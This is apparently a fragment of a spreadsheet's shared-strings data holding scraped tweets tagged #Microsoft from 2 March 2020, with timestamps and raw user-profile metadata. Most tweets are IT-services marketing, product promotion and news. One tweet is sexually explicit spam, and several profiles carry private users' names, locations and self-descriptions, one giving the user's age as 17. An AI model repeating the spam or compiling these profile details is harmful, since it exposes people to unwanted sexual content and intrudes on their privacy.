    <t>Transform #data into intelligent action. Less time, more value with #Microsoft #Cortana. Contact VerisVisalign to learn more. https://t.co/eT4UQUHAYk</t>
  </si>
  <si>
    <t>{'id': 2766506250, 'id_str': '2766506250', 'name': 'VerisVisalign', 'screen_name': 'VerisVisalign', 'location': 'Lansdale, PA 19446', 'description': 'VerisVisalign is a WBE/WBENC certified IT services company, that aligns technical and IT Service Management capabilities.', 'url': 'http://t.co/cjbZNAscAh', 'entities': {'url': {'urls': [{'url': 'http://t.co/cjbZNAscAh', 'expanded_url': 'http://www.verisvisalign.com/', 'display_url': 'verisvisalign.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 228, 'listed_count': 4, 'created_at': 'Mon Aug 25 14:29:13 +0000 2014', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1231,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'http://pbs.twimg.com/profile_images/503949863063535616/hblIC2o-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/503949863063535616/hblIC2o-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2766506250/1411487921',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</si>
  <si>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22:17:16 +0000 2020</t>
  </si>
  <si>
    <t>No matter where you are in your compliance journey, you can trust #Microsoft to help. https://t.co/xbwn1MYTdy</t>
  </si>
  <si>
    <t>Mon Mar 02 22:16:55 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/gFENrw28b5</t>
  </si>
  <si>
    <t>{'id': 2193466884, 'id_str': '2193466884', 'name': 'Bubble Social Media', 'screen_name': 'BubbleSocialMed', 'location': 'Silver Spring, Maryland', 'description': 'Bubble Social Media Marketing, LLC is your premier source for integrated Social Media Marketing services, Web Design and Hosting, and the Cloud in Maryland.', 'url': 'http://t.co/6gbfYFXISX', 'entities': {'url': {'urls': [{'url': 'http://t.co/6gbfYFXISX', 'expanded_url': 'http://www.bubblesocialmediamarketing.com', 'display_url': 'bubblesocialmediamarketing.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 375, 'friends_count': 932, 'listed_count': 135, 'created_at': 'Thu Nov 14 03:52:22 +0000 2013', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29150, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1F6B8E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/928255112736313344/DmuWzFW3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928255112736313344/DmuWzFW3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2193466884/1486776560',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</si>
  <si>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22:16:45 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/2ag13FaL4i</t>
  </si>
  <si>
    <t>{'id': 808884529, 'id_str': '808884529', 'name': 'Neil Holme', 'screen_name': 'ImpactBT', 'location': 'Newtown, CT', 'description': '', 'url': 'http://t.co/ZaYcyghY8M', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZaYcyghY8M', 'expanded_url': 'http://www.impactbt.com', 'display_url': 'impactbt.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Fri Sep 07 13:31:52 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1984,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'http://pbs.twimg.com/profile_images/2801011545/e69206ea62edcdb0e474c2135d264f78_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2801011545/e69206ea62edcdb0e474c2135d264f78_normal.jpeg',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</si>
  <si>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22:16:42 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/lBzYRMbCfL</t>
  </si>
  <si>
    <t>just a poopy rainbow six ace.  
#rainbowsixsiege
#xbox
#ubisoft
#Microsoft https://t.co/b10OwDohzX</t>
  </si>
  <si>
    <t>{'id': 932211776657281025, 'id_str': '932211776657281025', 'name': 'Sola Lupus', 'screen_name': 'XutoRegamai', 'location': 'somewhere in america', 'description': 'iâ€™m just on here for memes and maybe other stuff. \nnames Dariel \n17\ntrying to be a Corpsman, wish me luck.\ni like cars(Evo 8â€™s), guns &amp; games. typical stuff', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 159, 'listed_count': 0, 'created_at': 'Sun Nov 19 11:39:42 +0000 2017', 'favourites_count': 2129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 248, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235397169655566337/zWYC0zNQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235397169655566337/zWYC0zNQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/932211776657281025/1583123021',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</si>
  <si>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22:16:36 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/mlwCcsBFYx</t>
  </si>
  <si>
    <t>Mon Mar 02 22:15:47 +0000 2020</t>
  </si>
  <si>
    <t>Retweet if you want to cum on my face  #Laredo   #microsoft #pictures https://t.co/jTiMIkPSKC</t>
  </si>
  <si>
    <t>{'id': 1234546847974338561, 'id_str': '1234546847974338561', 'name': 'Lisa Glaser', 'screen_name': 'exchugbigi', 'location': 'Sioux Falls, USA', 'description': 'Heâ€™s more myself than I am. Whatever our souls are made of, his and mine are the same', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Mon Mar 02 18:31:25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'http://pbs.twimg.com/profile_images/1234583387630964737/sVqU5ACe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234583387630964737/sVqU5ACe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234546847974338561/1583182631',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</si>
  <si>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22:15:19 +0000 2020</t>
  </si>
  <si>
    <t>Unsure about your ability to meet #GDPR compliance? Thanks to integrations between #Microsoft Cloud App Security and Windows Defender ATP, ONIT Technology Solutions can help. https://t.co/ma3LyBdTrJ</t>
  </si>
  <si>
    <t>{'id': 1537702674, 'id_str': '1537702674', 'name': 'ONIT Tech Solutions', 'screen_name': '123onit', 'location': 'San Antonio, TX', 'description': 'More profit for your business by eliminating computer problems finally and forever. *For the #smb in #sanantonio through the #cloud. #satx, #sanantoniotx', 'url': 'https://t.co/ujPcPDCxCp', 'entities': {'url': {'urls': [{'url': 'https://t.co/ujPcPDCxCp', 'expanded_url': 'http://123onit.com', 'display_url': '123onit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 434, 'listed_count': 30, 'created_at': 'Sat Jun 22 02:00:08 +0000 2013', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5089,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/475413867451797505/YouBKwO2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/475413867451797505/YouBKwO2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1537702674/1402181859', 'profile_link_color': '4572C2', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '12291F', 'profile_text_color': '547B61', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 22:15:13 +0000 2020</t>
  </si>
  <si>
    <t>"#Office365 and #MicrosoftTeams have enriched our security fabric,  Deputy Vice President (IT) at Federal Bank.
#FederalBankLtd #perfectbankingpartner
@DTM_SYSTEMS is your local Silver @Microsoft Solutions advisor. #Microsoft365 @MicrosoftTeams #Microsoft #MicrosoftVancouver</t>
  </si>
  <si>
    <t>{'id': 22535347, 'id_str': '22535347', 'name': 'DTM Systems', 'screen_name': 'DTM_SYSTEMS', 'location': 'Vancouver, BC', 'description': 'Providing #Vancouver w/ IT &amp; Managed Services. Partners of: HPE, SOPHOS, Citrix, SCALE Computing, aruba, VMware, Microsoft, etc #DTMPartner', 'url': 'http://t.co/jU81OVi5Vx', 'entities': {'url': {'urls': [{'url': 'http://t.co/jU81OVi5Vx', 'expanded_url': 'http://www.dtm.ca', 'display_url': 'dtm.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 901, 'listed_count': 15, 'created_at': 'Mon Mar 02 21:17:49 +0000 2009', 'favourites_count': 448, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1275,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'http://pbs.twimg.com/profile_images/474261887383654400/iI7Tbtjg_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474261887383654400/iI7Tbtjg_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22535347/1579806739',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</si>
  <si>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22:15:03 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the blog: #MSFTAdvocate https://t.co/ipRMkayavt</t>
  </si>
  <si>
    <t>Mon Mar 02 22:15:01 +0000 2020</t>
  </si>
  <si>
    <t>Registration is open for the #Microsoft #IoTinActionMS event in Orlando on 3/9. Join us and Microsoft to gain actionable insights on building new #IoT experiences. https://t.co/0n0oeN0iuZ https://t.co/ALkDm17k0R</t>
  </si>
  <si>
    <t>{'id': 39497803, 'id_str': '39497803', 'name': 'Arrow Services', 'screen_name': 'arw_services', 'location': 'Worldwide', 'description': "Arrow's suite of services helps to simplify and sustain your entire technology lifecycleâ€“start to end.", 'url': 'https://t.co/KqaCXJ4q9b', 'entities': {'url': {'urls': [{'url': 'https://t.co/KqaCXJ4q9b', 'expanded_url': 'http://www.arrow.com/arrow-services', 'display_url': 'arrow.com/arrow-services', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11074, 'friends_count': 1079, 'listed_count': 102, 'created_at': 'Tue May 12 13:25:51 +0000 2009', 'favourites_count': 215, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4408, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D2D8DA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000645698653/84338d0d9fd8491f547fd8dfe138146e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000645698653/84338d0d9fd8491f547fd8dfe138146e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39497803/1566934928', 'profile_link_color': '4E6787', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E6ECC2', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 22:14:47 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/7n8NHDBxqP</t>
  </si>
  <si>
    <t>Mon Mar 02 22:14:40 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft Reigniting Browser Wars
Welcome to the 90s...when browser makers focused more on protecting their turf than supporting standards. A real loss for end users if MS &amp;amp; Google dont shape up 
#browserwars #microsoft #edge #google #chrome https://t.co/bSgvrgXBcT</t>
  </si>
  <si>
    <t>{'id': 17758736, 'id_str': '17758736', 'name': 'Matt Milano', 'screen_name': 'NeXTLoop', 'location': 'Out and about...', 'description': 'Writer, hacker, outdoor enthusiast. Ghostwriter and tech reporter for WebProNews.', 'url': 'https://t.co/VSWW6c1A3O', 'entities': {'url': {'urls': [{'url': 'https://t.co/VSWW6c1A3O', 'expanded_url': 'http://www.mattmilano.net', 'display_url': 'mattmilano.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 235, 'listed_count': 1, 'created_at': 'Sun Nov 30 17:58:22 +0000 2008', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 56,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'http://pbs.twimg.com/profile_images/481909240311709697/tC4ESuj0_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/481909240311709697/tC4ESuj0_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17758736/1398567519',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</si>
  <si>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Mon Mar 02 22:14:15 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/6hfl8Zh1ot</t>
  </si>
  <si>
    <t>{'id': 264220018, 'id_str': '264220018', 'name': 'PNS', 'screen_name': 'ericsonnywilson', 'location': 'Halifax, Nova Scotia, Canada', 'description': 'We offer Virtual hosting, hosted Exchange &amp; spam filtering services in Halifax and surrounding areas. Remote support services also available.', 'url': 'https://t.co/aVU4WyChTh', 'entities': {'url': {'urls': [{'url': 'https://t.co/aVU4WyChTh', 'expanded_url': 'http://www.protocolns.com', 'display_url': 'protocolns.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 174, 'friends_count': 636, 'listed_count': 36, 'created_at': 'Fri Mar 11 15:00:08 +0000 2011', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6011,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'http://pbs.twimg.com/profile_images/823564255488135168/Gp1S5ASA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/823564255488135168/Gp1S5ASA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/264220018/1453732903',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</si>
  <si>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22:14:05 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/rhDBWd5CEo</t>
  </si>
  <si>
    <t>Mon Mar 02 22:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that #AI is a core part of #Microsoft Dynamics 365 Business Central? Learn how #SMBs can work smarter and faster with the power of #AI.     #Technology #ArtificialIntelligence #MSDyn365 https://t.co/ZxeoVcieE2</t>
  </si>
  <si>
    <t>Mon Mar 02 22:13:56 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT dominated by bulls lifting the market higher throughout the day: https://t.co/fj52JQrSSj
Sentiment: Bullish #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 22:13:48 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/Sjsgte11fR</t>
  </si>
  <si>
    <t>Mon Mar 02 22:12:49 +0000 2020</t>
  </si>
  <si>
    <t>Hendrick Motorsports drives faster NASCAR performance with high-speed communication using #Microsoft #Teams. Watch the video to learn how. https://t.co/2Ej9SEe4wo</t>
  </si>
  <si>
    <t>{'id': 182203221, 'id_str': '182203221', 'name': 'InfoMedia Systems Group', 'screen_name': 'InfoMediaGroup', 'location': 'Ottawa, Canada', 'description': '', 'url': 'https://t.co/iu8PEtypVL', 'entities': {'url': {'urls': [{'url': 'https://t.co/iu8PEtypVL', 'expanded_url': 'http://www.infomediagroup.ca', 'display_url': 'infomediagroup.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 55, 'listed_count': 5, 'created_at': 'Tue Aug 24 02:08:11 +0000 2010', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3872,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'http://pbs.twimg.com/profile_images/1252916148/isgsmall_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1252916148/isgsmall_normal.png',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</si>
  <si>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22:12:43 +0000 2020</t>
  </si>
  <si>
    <t>62% of SMBs don't have an active cybersecurity strategy in place. Want to make sure that your data is secure, no matter what apps or devices you and your employees are using? Check out the latest security solutions from #Microsoft 365 Business. https://t.co/0ZnfMr5kL8</t>
  </si>
  <si>
    <t>Mon Mar 02 22:11:52 +0000 2020</t>
  </si>
  <si>
    <t>#SXSW: #Twitter is just the latest company to ban #travel for employees since the #virus has started to spread globally. ... #Amazon has also halted all nonessential travel, and #Apple, #Facebook and #Microsoft have implemented restrictions.
#tech https://t.co/1bHagBGZmo</t>
  </si>
  <si>
    <t>{'id': 323920783, 'id_str': '323920783', 'name': 'David Forrest', 'screen_name': 'NewsForrest', 'location': 'Austin, TX', 'description': 'An editor at @Statesman. News junkie, avid reader, film buff, history enthusiast, fan of the great outdoors and bit of a science/tech nerd. Retweets â‰  approval.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 315, 'friends_count': 131, 'listed_count': 120, 'created_at': 'Sat Jun 25 17:24:58 +0000 2011', 'favourites_count': 582, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18617,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'http://pbs.twimg.com/profile_images/732957895847895040/_gU-w-sj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/732957895847895040/_gU-w-sj_normal.jpg',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</si>
  <si>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22:11:12 +0000 2020</t>
  </si>
  <si>
    <t>Get Need for SpeedTM Payback for Xbox for $4.99
Link: https://t.co/EbddpTK1cz
#xbox #sale #games #deals #needforspeed #twitch #discord #deals #safety #microsoft #videogames https://t.co/s2esHQRucW</t>
  </si>
  <si>
    <t>{'id': 112920096, 'id_str': '112920096', 'name': 'ShopDilla', 'screen_name': 'ShopDillaDotCom', 'location': 'Chicago, IL', 'description': 'Giving you great deals daily!  #Deals #Coupons #Sweepstakes #Sales #Free #Discord #Rebates #Promotions', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 804, 'friends_count': 821, 'listed_count': 6, 'created_at': 'Wed Feb 10 03:51:44 +0000 2010', 'favourites_count': 30239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2766,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'http://pbs.twimg.com/profile_images/913995041739300864/r3FxDKml_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913995041739300864/r3FxDKml_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/112920096/1513648358',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</si>
  <si>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22:10:51 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/mllUOeqJXJ</t>
  </si>
  <si>
    <t>{'id': 806594163303182338, 'id_str': '806594163303182338', 'name': 'My Consumer I.T.', 'screen_name': 'MCITHouston', 'location': 'Houston, TX', 'description': 'My Consumer IT is dedicated to closing the gap between the corporations that provide services and the small to medium-size companies that use them.', 'url': 'https://t.co/XJjL3jLGZq', 'entities': {'url': {'urls': [{'url': 'https://t.co/XJjL3jLGZq', 'expanded_url': 'http://www.mcithouston.com', 'display_url': 'mcithouston.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 67, 'listed_count': 2, 'created_at': 'Wed Dec 07 20:20:09 +0000 2016', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 800, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/947844186576797701/Vbeya28X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947844186576797701/Vbeya28X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/806594163303182338/1514819684',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</si>
  <si>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From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/kwJBOHrDfF</t>
  </si>
  <si>
    <t>{'id': 370337899, 'id_str': '370337899', 'name': 'Bill Kinnamon', 'screen_name': 'BillyKinnamon', 'location': 'Pearland, Texas', 'description': 'Just trying to be right with God and the universe.', 'url': 'https://t.co/XJjL3jLGZq', 'entities': {'url': {'urls': [{'url': 'https://t.co/XJjL3jLGZq', 'expanded_url': 'http://www.mcithouston.com', 'display_url': 'mcithouston.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 83, 'listed_count': 2, 'created_at': 'Thu Sep 08 21:15:25 +0000 2011', 'favourites_count': 137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1313,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'http://pbs.twimg.com/profile_images/715727339267600384/fm__ftUG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/715727339267600384/fm__ftUG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/370337899/1459477651',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</si>
  <si>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22:10:18 +0000 2020</t>
  </si>
  <si>
    <t>The average cost of a data breach is $3.6 million. Is your company prepared to deal with the aftermath of a cyberattack? Check out this infographic for more on how we can help protect your company. #Microsoft #cybersecurity https://t.co/nQCVTWLy8W</t>
  </si>
  <si>
    <t>Mon Mar 02 22:09:18 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/pMdq8IHuMQ</t>
  </si>
  <si>
    <t>Mon Mar 02 22:07:34 +0000 2020</t>
  </si>
  <si>
    <t>@TefOnIssues @Telefonica @Microsoft @satyanadella @jmalvpal Wouldnt believe anything these #flowerpot say #microsoft and #Telefonica are #bottomfeeders</t>
  </si>
  <si>
    <t>{'id': 1132289034426998784, 'id_str': '1132289034426998784', 'name': 'Prof James', 'screen_name': 'Prof_James2', 'location': '', 'description': 'Have #fun in debate\n#followtrain always reply\n#iFollowback\n#ifb \nBe polite and respectful in debate\n#Twitter isnâ€™t real\nOld assumptions can let us down', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 147, 'friends_count': 201, 'listed_count': 0, 'created_at': 'Sat May 25 14:15:17 +0000 2019', 'favourites_count': 1175, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2722, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213463483771244545/pEh1sD6E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213463483771244545/pEh1sD6E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1132289034426998784/1578145848',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</si>
  <si>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22:06:21 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/XqjIN9FQa2</t>
  </si>
  <si>
    <t>{'id': 37553001, 'id_str': '37553001', 'name': 'Derek Sardo', 'screen_name': 'DerekSardo', 'location': 'Hamilton, ON, Canada', 'description': 'Owner of Rolling Thunder', 'url': 'http://t.co/ePiVEjpmLD', 'entities': {'url': {'urls': [{'url': 'http://t.co/ePiVEjpmLD', 'expanded_url': 'http://www.thunder.ca', 'display_url': 'thunder.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 129, 'listed_count': 5, 'created_at': 'Mon May 04 01:04:38 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 571,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'http://pbs.twimg.com/profile_images/857413597026299906/YUk9FTCX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/857413597026299906/YUk9FTCX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37553001/1493258240',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</si>
  <si>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Mon Mar 02 22:05:42 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/ziNi2aOT2J</t>
  </si>
  <si>
    <t>Mon Mar 02 22:05:23 +0000 2020</t>
  </si>
  <si>
    <t>In this infographic, learn how AI and tools like #Microsoft #BusinessIntelligence can help drive better marketing decisions and guide your business to greater growth. https://t.co/zd8MwVRkqq</t>
  </si>
  <si>
    <t>{'id': 70397352, 'id_str': '70397352', 'name': 'Russ Chatham Jr', 'screen_name': 'RussCJR', 'location': 'Glens Falls, NY', 'description': '', 'url': 'https://t.co/j4LvPnTkb6', 'entities': {'url': {'urls': [{'url': 'https://t.co/j4LvPnTkb6', 'expanded_url': 'http://www.russjr.com', 'display_url': 'russjr.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 108, 'listed_count': 7, 'created_at': 'Mon Aug 31 13:53:15 +0000 2009', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1163,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'http://pbs.twimg.com/profile_images/852988568611848192/kHFjzxGV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/852988568611848192/kHFjzxGV_normal.jpg',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</si>
  <si>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22:05:10 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting #Windows 10 Always On #VPN error code 864. #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/HrHtSwaNXp</t>
  </si>
  <si>
    <t>Mon Mar 02 22:04:02 +0000 2020</t>
  </si>
  <si>
    <t>Heart Research Institute is making cardiovascular disease a thing of the past. #Microsoft #Teams is making real-time collaboration a thing of the present. Watch them both come together in this uplifting video. https://t.co/boCnUKFsUR</t>
  </si>
  <si>
    <t>Mon Mar 02 22:04:01 +0000 2020</t>
  </si>
  <si>
    <t>Sysadmins: Is LibreOffice a viable office suite choice for your users? . https://t.co/Xt1ZZJ70WR LibreOffice is a full-featured office tool, but it has been slow to replace proprietary alternatives... #LibreOffice #Microsoft #microsoft #opensource #sysadmin #trickquestion</t>
  </si>
  <si>
    <t>Mon Mar 02 22:03:46 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/aN0ZThYQPj</t>
  </si>
  <si>
    <t>{'id': 186212392, 'id_str': '186212392', 'name': 'Omni B Solutions', 'screen_name': 'OmniBSolutions', 'location': 'Atlanta', 'description': 'Omni Business Solutions is a highly motivated and diverse IT Solutions and Outsourcing Service company.', 'url': 'http://t.co/tEt29r5un4', 'entities': {'url': {'urls': [{'url': 'http://t.co/tEt29r5un4', 'expanded_url': 'http://www.omnibusiness-solutions.com', 'display_url': 'omnibusiness-solutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 17, 'listed_count': 187, 'created_at': 'Thu Sep 02 21:30:02 +0000 2010', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14690, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '009AB9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3258231384/56ffc89d98d56043a97fdd3c5324e2e8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3258231384/56ffc89d98d56043a97fdd3c5324e2e8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/186212392/1502468517', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 22:01:03 +0000 2020</t>
  </si>
  <si>
